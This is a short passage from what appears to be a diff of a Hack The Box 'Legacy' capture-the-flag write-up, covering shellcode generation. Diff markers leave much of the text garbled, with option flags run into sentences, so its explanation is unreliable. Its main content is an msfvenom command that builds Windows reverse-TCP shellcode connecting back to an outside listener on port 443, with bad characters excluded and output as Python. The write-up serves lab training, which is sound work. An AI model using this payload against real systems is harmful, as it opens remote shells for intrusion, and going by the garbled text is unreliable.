HTB: Legacy

 Shellcode Generation

-• -f py - Output in python format.
+- Output in python format.
 The examples use c format, and just pasted it in slightly differently.
-Either will work.
+Either will work.-v shellcode

-• -v shellcode - Have the code set the variable shellcode, instead of the default, buf.
-I want this to match what it’s called in the code I’m using.
+.
+I want this to match what it’s called in the code I’m using.-a x86

 root@kali# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows